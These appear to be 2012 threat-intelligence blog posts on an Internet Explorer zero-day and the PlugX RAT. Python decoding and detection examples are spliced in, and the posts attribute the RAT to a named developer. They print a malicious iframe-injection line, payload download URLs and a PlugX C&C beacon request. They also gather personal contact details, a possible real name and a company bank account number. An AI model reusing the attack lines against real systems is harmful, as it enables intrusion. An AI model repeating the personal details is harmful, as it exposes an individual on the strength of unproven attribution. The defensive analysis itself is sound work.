AlienVault R&D Labs Portal. Get the latest news from our research.
As we described in our previous blog post, the latest Internet Explorer zero-day (the execCommand use-after-free, CVE-2012-4969) is being used to target specific sectors, including defence and industrial ones.

Following our investigation of the servers found serving the Internet Explorer zero-day, and using OSINT, we pivoted on the WHOIS e-mail address and the IP addresses used by the attackers to find fake domains they registered. Those domains contain the specific names of companies related to:

- US Aircraft and weapons delivery systems company

- US Defence decoy countermeasures company

- US Aerospace and defence technology company

- US Supplier for repairs of tactical fighters

- Laboratory for energetic systems and materials

- UK Defence contractor

We also found a fake domain of a company that builds turbines and power sources used in several applications including utilities and power plants.

We were able to confirm that the company's official website has been compromised as well and is serving the Internet Explorer zero-day to its visitors. The attackers included an iframe pointing to the exploit in the entry page.

The version of the exploit found here appears to be based on the code we found on the previous servers, and it also uses the Grumgog.swf Flash file to aid exploitation.

Apart from that, the exploit code seems to have evolved: they are now able to infect not only Windows XP but also 32-bit Windows 7 running Java 6. This is based on the Dodge.html file we found within the exploit code.

The Flash file is again encrypted with DoSWF, as in the previous versions, and licensed to bnetbgm@163.com.fr. Once the vulnerability is triggered, the malicious code downloads the payload from /_include/site.exe.

The payload is obfuscated with the same XOR 0x70 scheme and, once again, it contains a version of the PlugX RAT that we found in previous attacks.

The PlugX RAT connects to a C&C server at oXXX.blogdns.com, which resolves to 142.4.46.214. We recommend searching your logs for connections to that IP address, since any hit is a symptom of a compromised system.

In addition, these Emerging Threats Snort rules will help you catch exploit attempts and related activity:

2015704 – ET CURRENT_EVENTS DoSWF Flash Encryption Banner
2015711 – ET CURRENT_EVENTS Internet Explorer execCommand fuction Use after free Vulnerability 0day
2015712 – ET CURRENT_EVENTS Internet Explorer execCommand fuction Use after free Vulnerability 0day

Happy hunting!


jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.


A few hours ago my friend PhysicalDrive0 pointed me to a new version of Moh2010.swf that was found in the wild as part of content exploiting the latest Internet Explorer zero-day.

The exploit code was being served from www.nod32XX.com.

The exploit scheme is the same: the initial vector is hosted under /Exploit.html. It sets up the img content and loads the Moh2010.swf file.

The file Moh2010.swf is slightly different from the previous one. It is also encrypted using DoSWF, but the encrypted content differs.

We can also confirm that DoSWF is licensed to bnetbgm@163.com.fr.

Once the SWF file is executed, it uses eval to inject a new iframe into the page:

document.body.innerHTML="x<iframe src=Eternalian.html width=10 height=1></iframe>"

This file is very similar to the Protect.html one that we described in our report yesterday.

It triggers the actual vulnerability. The SWF file has already sprayed the heap, and the shellcode is in charge of downloading, decrypting and executing the payload.

The HTTP headers on the server indicate that the files were created four days earlier, meaning the zero-day was not yet public:

last-modified: Fri, 14 Sep 2012 05:29:51 GMT

Last-Modified: Fri, 14 Sep 2012 05:30:07 GMT

Because the SWF file is encrypted using DoSWF, the easiest way to obtain the original file is to attach a debugger to Internet Explorer and dump the decrypted SWF from process memory.
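As an added example (not code from the original post), here is a small Python carver for the kind of memory dump that step produces: it scans the dump for FWS/CWS headers, validates the length field, inflates CWS streams and hands back standalone files ready for a decompiler. The "dump" it runs on is constructed inline; the header layout (3-byte signature, version byte, little-endian total length) is the public SWF format, while the accepted version range and the omission of LZMA (ZWS) files are my assumptions.

```python
import struct
import zlib

# Signatures of the two SWF container types handled here (FWS = uncompressed,
# CWS = zlib-compressed). ZWS (LZMA) is deliberately left out (assumption).
SWF_SIGNATURES = (b"FWS", b"CWS")


def build_fws(body: bytes, version: int = 10) -> bytes:
    """Build an uncompressed SWF: signature, version, total length (LE32), body."""
    return b"FWS" + bytes([version]) + struct.pack("<I", 8 + len(body)) + body


def build_cws(body: bytes, version: int = 10) -> bytes:
    """Build a zlib-compressed SWF. The length field is the *uncompressed* size."""
    return b"CWS" + bytes([version]) + struct.pack("<I", 8 + len(body)) + zlib.compress(body)


def to_fws(swf: bytes) -> bytes:
    """Normalise a carved SWF to FWS so any decompiler can read it."""
    if swf[:3] == b"CWS":
        return b"FWS" + swf[3:8] + zlib.decompress(swf[8:])
    return swf


def carve_swfs(dump: bytes):
    """Return [(offset, signature, version, data)] for every plausible SWF in dump.

    A hit must have a sane version byte and a length that covers the 8-byte
    header. For FWS the whole file must fit inside the dump; for CWS the zlib
    stream must end cleanly and inflate to exactly the length the header claims.
    """
    found = []
    pos = 0
    while True:
        hits = [h for h in (dump.find(sig, pos) for sig in SWF_SIGNATURES) if h != -1]
        if not hits:
            return found
        off = min(hits)
        pos = off + 1
        if off + 8 > len(dump):
            continue
        sig = dump[off:off + 3]
        version = dump[off + 3]
        (length,) = struct.unpack_from("<I", dump, off + 4)
        if not (1 <= version <= 50 and length >= 8):       # assumed sane version range
            continue
        if sig == b"FWS":
            if off + length <= len(dump):
                found.append((off, sig, version, dump[off:off + length]))
        else:
            dec = zlib.decompressobj()
            try:
                body = dec.decompress(dump[off + 8:])
            except zlib.error:
                continue
            if dec.eof and 8 + len(body) == length:
                end = len(dump) - len(dec.unused_data)     # bytes after the zlib trailer
                found.append((off, sig, version, dump[off:end]))


# Constructed sample "memory dump" (not data from the post): junk, a false
# "FWS" hit with an implausible version byte ('?'), one FWS file, one CWS file.
FWS_BODY = b"\x78\x00\x05\x5f\x00\x00\x0f\xa0\x00\x00\x0c\x01\x00" + b"\x00" * 40
CWS_BODY = b"\x78\x00\x05\x5f\x00\x00\x0f\xa0\x00\x00\x0c\x01\x00" + b"A" * 200
SAMPLE_DUMP = (b"\x00" * 16 + b"junk FWS? junk" + build_fws(FWS_BODY)
               + b"\xcc" * 9 + build_cws(CWS_BODY) + b"\xff" * 5)

if __name__ == "__main__":
    for off, sig, ver, data in carve_swfs(SAMPLE_DUMP):
        print(f"{sig.decode()} v{ver} at 0x{off:x}, {len(data)} bytes, FWS size {len(to_fws(data))}")
```

Run it against a raw process dump of iexplore.exe taken after the page has loaded; DoSWF's loader decrypts the real movie into memory as an ordinary FWS/CWS blob, which is exactly what the carver is looking for.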

In the decrypted SWF file we found a ByteArray.

Base64-decoding it and then XORing every byte with 0xE2 yields the URL of the malicious payload:

www.nod32XX.com/test.exe (md5: fef2d60ec7ec015f1e119dc469b14f59)

The downloaded file is itself obfuscated: XORing with 0x70 every byte whose value is neither 0x00 nor 0x70 recovers the original payload (md5: 00fdb6ad7345c0912ea9d2fa4c49950e).
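Both decoding steps (the base64 + XOR 0xE2 URL, and the XOR 0x70 payload that leaves 0x00 and 0x70 bytes alone) are simple enough to reproduce. The following Python is an added example, not the attackers' code or anything from the original post. The real ByteArray and sample are not reproduced here, so the inputs are constructed: the post's URL re-encoded with the same scheme, and a fake PE stub whose bytes cover all three cases of the skip rule.

```python
import base64
import hashlib


def xor_all(data: bytes, key: int) -> bytes:
    """Plain single-byte XOR over every byte (the scheme used for the URL)."""
    return bytes(b ^ key for b in data)


def xor_skip(data: bytes, key: int) -> bytes:
    """XOR with key, but leave bytes equal to 0x00 or to key untouched.

    This is the payload scheme. Skipping those two values keeps the large
    zero-filled regions of a PE as zeros (so the key never shows up as long
    runs of 0x70), and the transform is its own inverse: the same function
    obfuscates and deobfuscates.
    """
    return bytes(b if b in (0, key) else b ^ key for b in data)


def decode_url(blob_b64: str, key: int = 0xE2) -> str:
    """Recover the download URL: base64 first, then XOR 0xE2."""
    return xor_all(base64.b64decode(blob_b64), key).decode("ascii")


def decode_payload(blob: bytes, key: int = 0x70) -> bytes:
    """Recover the dropped executable: XOR 0x70, skipping 0x00/0x70 bytes."""
    return xor_skip(blob, key)


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check that decoding produced a Windows executable."""
    return len(data) >= 0x40 and data[:2] == b"MZ"


def md5hex(data: bytes) -> str:
    """MD5 of the decoded file, to compare with the hashes quoted in the post."""
    return hashlib.md5(data).hexdigest()


# Constructed inputs (not the real ByteArray or sample from the post).
SAMPLE_URL = "www.nod32XX.com/test.exe"
SAMPLE_B64 = base64.b64encode(xor_all(SAMPLE_URL.encode("ascii"), 0xE2)).decode("ascii")
FAKE_PE = (b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
           + b"\x00" * 48 + b"\x70PE\x00\x00")
OBFUSCATED_PE = xor_skip(FAKE_PE, 0x70)

if __name__ == "__main__":
    print("URL:", decode_url(SAMPLE_B64))
    recovered = decode_payload(OBFUSCATED_PE)
    print("PE header ok:", looks_like_pe(recovered), "md5:", md5hex(recovered))
```

Replace `OBFUSCATED_PE` with the bytes fetched from the URL and compare `md5hex()` of the result against the hash in the post; if the MZ check fails, the key or the skip rule has changed and the sample deserves a closer look.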

The malicious payload is a WinRAR self-extracting archive that drops several resources during execution:

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\RarSFX0\Nv.exe MD5: 09B8B54F78A10C435CD319070AA13C28
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\RarSFX0\Nv.mp3 MD5: B29265A6932E1FC4DEE6FA6908413A50
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\RarSFX0\NvSmartMax.dll MD5: 0B21678ED8E2B117344CFCEBA8F097DD

The file NvSmartMax.dll is familiar, isn't it? We described this technique some days ago. The file Nv.exe, also known as NvSmart.exe, is a benign file signed by Nvidia and used widely in several Nvidia applications.

Once Nv.exe is executed it loads NvSmartMax.dll, which has been modified to execute the binary content present in Nv.mp3.

Because Nv.exe is digitally signed with a valid certificate, it gets past some of the operating system's restrictions, and this technique is used to execute the malicious payload every time the system boots.

Surprise! The actual payload present in Nv.mp3 is a version of the PlugX RAT that we uncovered a few days ago. Do you remember WHG, the guy behind it?

We can find the same debug path that we found in our previous blog post:

d:\work\plug4.0(nvsmart)(sxl)\shellcode\shellcode\XSetting.h

d:\work\plug4.0(nvsmart)(sxl)\shellcode\shellcode\XPlug.h

The RAT connects to the C&C server at exchange.likescandy.com, which currently resolves to 108.171.193.92.

The RAT uses the well-known PlugX update protocol. An example request:

POST /update?id=000f6b50 HTTP/1.1
Accept: */*
X-Session: 0
X-Status: 0
X-Size: 61456
X-Sn: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR1.0.3705)
Host: exchange.likescandy.com
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
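To make that beacon actionable, here is an added Python example (not code from the post, and not an Emerging Threats rule) that parses a raw HTTP request, decides whether it has the shape of a PlugX update beacon (POST /update?id=<8 hex digits> together with the X-Session, X-Status, X-Size and X-Sn headers) and extracts the fields an analyst wants, checking Host and destination IP against the indicators listed on this page. The beacon below is the one from the post with the User-Agent shortened; the benign request is constructed. Requiring all four X-* headers, and the 8-hex-digit id, are my choices rather than a documented specification.

```python
import re

# Constructed inputs: the beacon from the post (User-Agent shortened) and a
# benign-looking request to the same path that lacks the PlugX headers.
PLUGX_BEACON = (
    "POST /update?id=000f6b50 HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "X-Session: 0\r\n"
    "X-Status: 0\r\n"
    "X-Size: 61456\r\n"
    "X-Sn: 1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)\r\n"
    "Host: exchange.likescandy.com\r\n"
    "Content-Length: 0\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)
BENIGN_REQUEST = (
    "POST /update?id=000f6b50 HTTP/1.1\r\n"
    "Host: updates.example.com\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# Indicators taken from the posts on this page.
IOC_HOSTS = {"exchange.likescandy.com", "exchange.from-sc.com", "exchange.is-a-landscaper.com",
             "aol.selfip.com", "inmailbase.selfip.com", "ns18.doomdns.com"}
IOC_IPS = {"108.171.193.92", "142.4.46.214", "142.4.46.203", "180.210.204.180"}

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01]$")
PLUGX_PATH = re.compile(r"^/update\?id=[0-9a-f]{8}$")         # assumed id format
PLUGX_HEADERS = ("x-session", "x-status", "x-size", "x-sn")   # all required (assumption)


def parse_request(raw: str):
    """Split an HTTP request into (method, path, headers) or None if malformed."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    m = REQUEST_LINE.match(lines[0])
    if not m:
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return m.group("method"), m.group("path"), headers


def is_plugx_beacon(raw: str) -> bool:
    """PlugX update beacon: POST /update?id=<8 hex> plus the four X-* bookkeeping headers."""
    parsed = parse_request(raw)
    if parsed is None:
        return False
    method, path, headers = parsed
    return (method == "POST" and PLUGX_PATH.match(path) is not None
            and all(h in headers for h in PLUGX_HEADERS))


def beacon_details(raw: str, dst_ip: str = ""):
    """Fields an analyst wants from a beacon, plus whether it hits a known IOC."""
    if not is_plugx_beacon(raw):
        return None
    _, path, headers = parse_request(raw)
    host = headers.get("host", "")
    return {
        "victim_id": path.split("=", 1)[1],
        "host": host,
        "session": int(headers["x-session"]),
        "status": int(headers["x-status"]),
        "size": int(headers["x-size"]),
        "sn": int(headers["x-sn"]),
        "ioc_hit": host in IOC_HOSTS or dst_ip in IOC_IPS,
    }


def scan_requests(requests, dst_ips=None):
    """Run the detection over a batch; returns (index, details) for every beacon."""
    dst_ips = dst_ips or [""] * len(requests)
    return [(i, beacon_details(r, ip))
            for i, (r, ip) in enumerate(zip(requests, dst_ips)) if is_plugx_beacon(r)]


if __name__ == "__main__":
    for idx, details in scan_requests([BENIGN_REQUEST, PLUGX_BEACON], ["", "108.171.193.92"]):
        print(idx, details)
```

The header-shape check catches the beacon even when the C&C host is new, which is the point of pairing it with the IOC list rather than relying on the list alone; feed it the request text reconstructed from proxy logs or a PCAP and alert on either condition.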

Summary

We know that the group actively using the PlugX malware, also called Flowershow, had access to the Internet Explorer zero-day days before it was uncovered. Given the similarities between the newly discovered exploit code and the one found some days ago, it is very likely that the same group is behind both instances.

They are using the PlugX RAT as well as the NvSmart technique seen in previous targeted attacks. In our previous post we were able to identify the author of this RAT, and given the similarities between the attacks it is very likely that he is somehow involved in this code as well.

We have identified several IP addresses and domains currently used by this group, including:

aol.selfip.com 180.210.204.180
inmailbase.selfip.com 180.210.204.180
exchange.from-sc.com 180.210.204.180
exchange.likescandy.com 180.210.204.180
exchange.is-a-landscaper.com 180.210.204.180
leanov.gicp.net 180.210.204.180
netbastthebash.dnsalias.net 180.210.204.180
wwwh4ck.3322.org 180.210.204.180
gary-freudenberger.homeftp.org 180.210.204.180

aol.selfip.com 142.4.46.203
ns18.doomdns.com 142.4.46.203
exchange.from-sc.com 142.4.46.203
exchange.likescandy.com 142.4.46.203
exchange.is-a-landscaper.com 142.4.46.203

We recommend checking your logs for connections to those IPs and domains to determine whether your systems are being targeted by them.

More information regarding WHG

After some research on WHG we were able to gather some new information about him:

- WHG attended Xihua University (Sichuan province), as revealed by another e-mail address (whg0001@263.com) and a personal web account on the university server, http://pweb.scit.edu.cn/~whg. You can find references on Baidu and elsewhere where he talks about the university, as well as source code written when he was a student.

http://en.wikipedia.org/wiki/Network_Crack_Program_Hacker_(NCPH)_Group

“The Network Crack Program Hacker (NCPH) group is a Chinese hacker group based out of Zigong in Sichuan Province”
“Wicked Rose credits the Chinese hacker WHG, also known as “fig” as one of the developers of the GinWui rootkit. WHG is an expert in malicious code”
“Security researchers discovered the rootkit on 18 May 2006 attackers utilized it in attacks on the US and Japan. Attackers introduced it to the US in an attack against a Department of Defense entity. They used two different versions of the rootkit in attacks during May and June 2006.”
“After winning the military network attack/defense competition, the group obtained a sponsor who paid them 2000 RMB per month. IDefense believes their sponsor is likely the People’s Liberation Army (PLA) but has no definitive evidence to support this claim.”
“Tan Dailin was a graduate student at Sichuan University when he was noticed (for attacking a Japanese site) by the People’s Liberation Army (PLA) in the summer of 2005. He was invited to participate in a PLA-sponsored hacking contest and won. He subsequently participated in a one-month, 16-hour-per-day training program where he and the other students simulated various cyber invasion methods, built dozens of hacking exploits, and developed various hacking tactics and strategies. He was chosen for the Sichuan regional team to compete against teams from Yunnan, Guizhou, Tibet, and Chongqing Military Districts. His team again ranked number one and he won a cash prize of 20,000 RMB.

Then, under the pseudonym Wicked Rose, he formed the Network Crack Program Hacker (NCPH) Group and recruited other talented hackers from his school. He found a funding source (an unknown benefactor) and started attacking US sites. After an initial round of successful attacks, his funding was tripled. All through 2006, NCPH built sophisticated rootkits and launched a barrage of attacks against multiple US government agencies. By the end of July, 2006, NCPH had created some 35 different attack variants for one MS Office vulnerability. During the testing phase, NCPH used Word document vulnerabilities. They switched to Excel and later to PowerPoint vulnerabilities. The result of all of this activity is that the NCPH group siphoned thousands, if not millions, of unclassified US government documents back to China.”

http://fserror.com/pdf/WickedRose_andNCPH.doc

WHG is not a core member of NCPH but a close affiliate of Wicked Rose.  WHG appears to be central to development of the NCPH rootkit, aka GinWui.  WHG is credited by Wicked Rose as one of the authors of this malicious code.  WHG is an experienced malicious code author with the following contact information:

  • E-mail address: whg@163.com
  • QQ Number: 312016
  • Website: http://cnasm.com
  • Real Name: May be “Zhao Jibing”,赵纪斌.
  • Location: Believed to be employed in the Sichuan province of China.

Warlock: Master of the Arcane game

After reviewing the files used to exploit the Internet Explorer vulnerability, we identified that the attackers are fans of a game called “Warlock: Master of the Arcane”. They use several variable names inside the code that refer to the names of Warlock's Great Mages. Some examples:

King Lich V inside the decrypted SWF file

<body onload='Elpiritster();' onselect='TestArray()'> in the Eternalian.html file.

I hope you enjoyed this blog post!

 
Update:

In the last few hours we found two more sites that had served the zero-day exploit.

The first file we found was a version of Protect.html that was being served on the website of one of the main defence news portals in India. It contains code to trigger the Internet Explorer vulnerability and was being served four days ago. We could not retrieve the actual payload, and it seems the malicious content is no longer there.

The second server serving the exploit appears to be a fake domain for the 2nd International LED professional Symposium +Expo; it was taken down a few hours ago:

led-professional-symposium.org

Created On:06-Jul-2012 07:04:31 UTC
Last Updated On:18-Sep-2012 17:08:27 UTC
Expiration Date:06-Jul-2013 07:04:31 UTC
Sponsoring Registrar:GoDaddy.com, LLC (R91-LROR)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Registrant ID:CR118174435
Registrant Name:Gexin sun
Registrant Street1:Yaroslaviv Val Street, Kyiv, 01034,
Registrant City:Kiev
Registrant State/Province:Kiev
Registrant Postal Code:03022
Registrant Country:UA
Registrant Phone:+380.952756104
Registrant Email:kathycat88@gmail.com

The initial vector was hosted under led.html.

The code is very similar to the previous ones. Note that the name of the SWF used is different, Grumgog.swf; Grumgog is also a term used in the “Warlock: Master of the Arcane” game.

The Flash file is also encrypted with DoSWF, using the license key issued to “bnetbgm@163.com.fr” as in the previous version.

Once decrypted, we identified that an iframe (Dodge.html) is loaded. We could not retrieve its content.

Once the vulnerability is triggered, the malicious payload is downloaded from update.exe (the file had been removed at the time of analysis).

It seems the people behind this zero-day were targeting specific industries: they compromised a news site related to the defence industry, and they created a fake domain related to LED technologies that can be used for spearphishing campaigns against those industries.

jaime.blasco

Tracking down the author of the PlugX RAT

September 13th, 2012 | Posted by jaime.blasco in APT | Attacks | News - (Comments Off)

Some days ago, TrendMicro published information about a new version of a RAT called PlugX. For the last few months we have been tracking a group using the PlugX RAT that has been attacking different targets, especially in Japan, Taiwan and Korea, and against Tibetan organizations and individuals.

In this post we will focus on the intelligence we have extracted from the payloads of the attacks and how we used this information to track the author of the RAT that is very likely to be involved in the attacks as well.

During the past few months we have seen spearphishing campaigns against Tibetan targets using mainly Microsoft Office exploits (CVE-2012-0158). Those documents used a very tricky technique: the dropped payload was a benign Nvidia executable (NvSmart.exe), a DLL (NvSmartMax.dll) and a binary file (boot.ldr). This technique was explained by Symantec as well.

NvSmart.exe

https://www.virustotal.com/file/523d28df917f9d265cd2c0d38df26277bc56a535145100ed82e6f5fdeaae7256/analysis/


As we can see, the binary is signed by Nvidia, since it is a benign file used in some Nvidia applications. Once NvSmart.exe is executed, it loads NvSmartMax.dll. The attackers drop a modified version of NvSmartMax.dll which executes the binary content present in boot.ldr, and that file contains the actual malicious code.

Since NvSmart.exe is configured to run when the computer starts and carries a valid digital signature, it gets past some of the OS restrictions, and the malicious code is executed every time the system boots.

Once the payload is executed, a decoy file is shown to the user, as in most of the attacks we have seen over the past few years; the attackers used a variety of such decoy documents as lures.

In most of the boot.ldr files we found the RAT called PlugX.

At the beginning of our investigation, some months ago, we found that some of the PlugX binaries contained debug paths such as:

Hash: c1c80e237f6fbc2c61b82c3325dd836f3849ca036a28007617e4e27ba2f16c4b

Debug Path: d:\work\plug4.0(nvsmart)(sxl)\shellcode\shellcode\XPlug.h

Compilation date: 6/17/2012 16:44:58

 

Hash: 1a091c2ddf77c37db3274f649c53acfd2a0f14780479344d808d089faa809a_HHDL’s Birthday Celebration.doc

Debug Path: d:\work\Plug3.0(Gf)UDP\Shell6\Release\Shell6.pdb

Compilation date: 6/17/2012 16:44:58

 

Hash: 42813b3a43611efebf56239a1200f8fc96cd9f3bac35694b842d9e8b02a

Debug Path: d:\work\plug4.0(nvsmart)\shellcode\shellcode\XPlug.h

Compilation date: 5/26/2012 7:16:08

 

Hash: 28762c22b2736ac9728feff579c3256bd5d18bdfbf11b8c00c68d6bd905af5b8

Debug Path: d:\work\plug3.1(icesword)\shellcode\shellcode\XPlug.h

Compilation date: 6/14/2012 6:06:00

It seems that there are several versions of the RAT, and if you take a look at the binaries you will notice changes and new capabilities in each version.

We searched our collection for other XPlug samples beyond the ones dropped by the malicious documents we had, and found some:

Hash: 3b01677582e7a56942a91da9728c6251- financial_report.exe

Debug Path: C:\Users\whg\Desktop\Plug\FastGui(LYT)\Shell\Release\Shell.pdb

Compilation date: 6/17/2012 16:44:58

 

Hash: 60ee900d919da8306b7b6dbe7e62fee49f00ccf141b2e396f5a66be51a00e34f

Debug Path: C:\Documents and Settings\whg\\Plug\FastGui(LYT)\Shell\Release\Shell.pdb

Compilation date: 2012-03-12 07:04:12

 

Hash: c00cd2dcddbb24383a3639ed56e68a24dc4561b1248efa4d53aa2b68220b4b2a

Debug Path: C:\Users\whg\Desktop\Plug\FastGui(LYT)\Shell\Release\Shell.pdb

Compilation date: 3/12/2012 14:23:58

The debug paths found in those files are more interesting, since the path contains a username, “whg”. We have two different path prefixes, “C:\Documents and Settings\whg\” and “C:\Users\whg\”, so it is likely that in the first case the author is using a Windows XP system and in the second a Vista/7 system.
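The pivot described here (find a username in a PDB path, then hunt for other binaries compiled under the same profile) is easy to automate. The following is an added Python example, not the tooling used for this post: it pulls debug paths out of a binary blob with a regex, classifies the profile prefix as XP or Vista/7 and groups samples by username. The blobs are constructed from the paths quoted above; the extension list (pdb/h/pas/cpp) and the path-length cap are my assumptions.

```python
import re
from collections import defaultdict

# A debug/source path as it survives in a compiled binary: drive letter,
# backslash-separated components, ending in a PDB or source-file extension.
# The extension list and the 250-char cap are assumptions.
PATH_RE = re.compile(rb'[A-Za-z]:\\[^\x00-\x1f"<>|*?]{2,250}?\.(?:pdb|h|pas|cpp)\b', re.IGNORECASE)
# Profile directory prefixes: "Documents and Settings" is XP, "Users" is Vista/7.
PROFILE_RE = re.compile(r'^[A-Za-z]:\\(Users|Documents and Settings)\\([^\\]+)\\', re.IGNORECASE)


def extract_debug_paths(blob: bytes):
    """Return the distinct debug paths embedded in a binary, in order of appearance."""
    seen = []
    for m in PATH_RE.finditer(blob):
        path = m.group(0).decode("latin-1")
        if path not in seen:
            seen.append(path)
    return seen


def profile_info(path: str):
    """(username, os_generation) if the path sits under a user profile, else None."""
    m = PROFILE_RE.match(path)
    if not m:
        return None
    generation = "XP" if m.group(1).lower() == "documents and settings" else "Vista/7"
    return m.group(2), generation


def pivot_by_user(samples):
    """Map username -> sorted names of the samples whose debug paths reveal that user."""
    by_user = defaultdict(set)
    for name, blob in samples.items():
        for path in extract_debug_paths(blob):
            info = profile_info(path)
            if info:
                by_user[info[0]].add(name)
    return {user: sorted(names) for user, names in by_user.items()}


# Constructed sample blobs (not real binaries): each embeds one of the paths
# quoted in the post between unrelated bytes.
SAMPLES = {
    "plugx_nvsmart": b"\x00" * 8 + b"d:\\work\\plug4.0(nvsmart)(sxl)\\shellcode\\shellcode\\XPlug.h\x00" + b"\xcc" * 8,
    "plugx_fastgui": b"MZ\x90\x00garbage\x00C:\\Users\\whg\\Desktop\\Plug\\FastGui(LYT)\\Shell\\Release\\Shell.pdb\x00",
    "sockmon": b"\x00c:\\Documents and Settings\\whg\\\\SockMon2010\\SmComm\\Release\\SmComm.pdb\x00\x90\x90",
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        for path in extract_debug_paths(blob):
            print(name, path, profile_info(path))
    print(pivot_by_user(SAMPLES))
```

Point `SAMPLES` at real files read in binary mode and the output is the same kind of table the post builds by hand: which samples share a build machine, and whether that machine was XP or Vista/7.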

With this information, we began searching for binaries containing similar debug paths. The search turned up an application called SockMon, which led us to http://www.cnasm.com/view.asp?classid=49&newsid=320 and http://www.cnasm.com/view.asp?classid=49&newsid=315.

The debug paths we found in files belonging to a different SockMon version are:

C:\Users\whg\Desktop\SockMon2011\SockMon\UnitCache.pas

c:\Documents and Settings\whg\SockMon2010\RunProtect\Release\RunProtect.pdb

c:\Documents and Settings\whg\\SockMon2010\SmComm\Release\SmComm.pdb

We also found another library called vtcp (http://www.cnasm.com/vtcpsdk/) that contains the following debug path:

C:\Users\whg\Desktop\vtcp11.0lib\vtcpT0\UnitMain.pas

Does this all look familiar? It seems that the user “whg” compiled these components, and he is also running a couple of machines whose paths correspond to the ones we found in the XPlug RAT.

If we take a look at cnasm.com we can find the following contact information:

email: whg0001 at 163.com

QQ: 312016

So the e-mail address also coincides with the username we found in the debug paths of the RAT samples.

Let's see what we can find about whg0001 at 163.com. The e-mail address was used as the administrative contact for the domain chinansl.com back in 2000:

Domain Name      : chinansl.com
PunnyCode        : chinansl.com
Creation Date    : 2000-08-08 00:00:00
Updated Date     : 2012-02-29 11:26:22
Expiration Date  : 2013-08-08 00:00:00

Registrant:
Organization   : chinansl technology co.,itd
Name           : lishiyun
Address        : Room E8BC , XiangFu Garden , 3rd Southern portion of 2nd ringroad , Chengdu , Si
City           : chengdushi
Province/State : sichuansheng
Country        : china
Postal Code    : 610041

Administrative Contact:
Name           :
Organization   : chinansl technology co.,itd
Address        :
City           : chengdushi
Province/State : sichuansheng
Country        : china
Postal Code    : 610041
Phone Number   :
Fax            : 086-028-85459578
Email          : whg0001@163.com

Further information about the company (overview):

Company Name: CHINANSL TECHNOLOGY CO.,LTD.
Address: Chengdu National Information Security Production Industrialization Base, 2nd Floor, No.8 Chuangye Road
Telephone: 02866853362
Custom Code: 5101730218773
Company Code: 730
Account-opening Bank: Xisanqi Sub-branch, Beijing Branch, Bank of China
Account Name: Beijing Lingtong Economic Consulting Co., Ltd
Account Number: 813715881608091001

From the information we collected it seems to be a Chinese company related to the security industry. Of course!

We also found a software component called “Parent Carefree Filter”:

https://www.virustotal.com/file/3babb326615b899e976a1a9dc51ec04118701a5de702494f1d363194060c5db7/analysis/

publisher: CHINANSL
product: Parent Carefree Filter
internal name: FamHook
file version: 3, 0, 0, 1
original name: FamHook.dll
copyright: CHINANSL
description: Parent Carefree Filter

And of course we found a similar debug path in the file:

c:\Documents and Settings\whg\Pnw(all)\Pc()\FamHook\Release\FamHook.pdb

You can also find some advisories that Chinansl published back in 2000 and 2001:

CHINANSL Security Advisory (CSA-200110) – Tomcat 4.0-b2 for winnt/2000 show “.jsp” source Vulnerability
CHINANSL Security Advisory (CSA-200011) – PHP AND APACHE Vulnerability
CHINANSL Security Advisory (CSA-200012) – Ultraseek Server 3.0 Vulnerability
CHINANSL Security Advisory (CSA-200013) – IBM WCS local user exceed his authority to access another file
CHINANSL Security Advisory (CSA-200105) – Tomcat 3.0 for win2000 Directory traversal Vulnerability
CHINANSL Security Advisory (CSA-200106) – JavaServer Web Dev Kit(JSWDK)1.0.1 for win2000 Directory traversal Vulnerability
CHINANSL Security Advisory (CSA-200108) – Tomcat 3.2.1 for win2000 Directory traversal
CHINANSL Security Advisory (CSA-200107) – IBM WCS 4.0.1 + Application Server 3.0.2 for Solaris 2.7 show “.jsp” source Vulnerability.
CHINANSL Security Advisory (CSA-200109) – Tomcat 4.0-b1 for winnt/2000 show “.jsp” source Vulnerability.

 

There are several references to whg0001 on the Internet:

https://www.xfocus.net/bbs/index.php?act=ST&f=1&t=54500

http://bbs.krshadow.com/thread-58032-1-1.html

They describe him as “Virus expert. Proficient in assembly.”.

And finally there is his CSDN profile, where you can find a photo of him.

At this point you must be thinking we cannot accuse whg of being related to the XPlug RAT and the targeted campaigns just for a couple of debug paths inside the binary, can we?

Ok, here is the final touch. After searching for more versions of the PlugX RAT we found these two samples:

2ba7f1cc1f46a17ccfbef6b327d8c4e47f9d56922debcad27e5db569f4cf818d

51e50d810172591ee04e12cfce0792f3154356588eacadc01288e3a4fda915fb

They contain this debug path:

i:\work\plug2.0()\shellcode\shellcode\XPlug.h

and the following URL:

http://tieba.baidu.com/f?kz=866965377

that seems to be used as a test or to check connectivity (more info in future posts).

Surprisingly, when you open the URL you see a photo of the poster. Is this guy familiar to you?

